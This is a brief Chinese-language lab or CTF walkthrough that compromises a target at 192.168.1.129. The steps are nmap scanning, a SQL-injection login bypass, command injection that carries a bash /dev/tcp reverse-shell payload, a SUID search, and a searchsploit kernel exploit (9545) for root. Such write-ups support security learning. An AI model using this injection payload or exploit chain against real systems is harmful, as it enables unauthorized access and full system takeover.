扫描主机
nmap 192.168.1.1/24 -sn --min-rate 2222 -R
|
端口探测
nmap 192.168.1.129 -p- --min-rate 9999 -sS -PN -oA nmap_results/nmap_port
|
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 443/tcp open https 631/tcp open ipp 998/tcp open busboy 3306/tcp open mysql
|
对端口指纹探测
nmap 192.168.1.129 -p 22,80,111,443,631,998,3306 -sV -sC -O --version-all -oA nmap_results/server_info
|
访问网站

使用sql注入的万能密码登录

命令拼接,可以执行命令

反弹shell
192.168.1.130;bash -i >& /dev/tcp/192.168.1.128/8888 0>&1
|

提权
先去查看有没有什么计划任务
查看拥有suid的权限,且可执行文件
find -perm -u=s / -type f 2>/dev/null
|
查看版本信息
uname -a cat /etc/*release*
|

内核提权
查找漏洞
searchsploit Linux Kernel 2.6 CentOS searchsploit Linux Kernel 2.6 CentOS -m 9545
|
将脚本上传到靶机,根据9545.c
的源码提示进行编译,然后运行脚本,成功提权。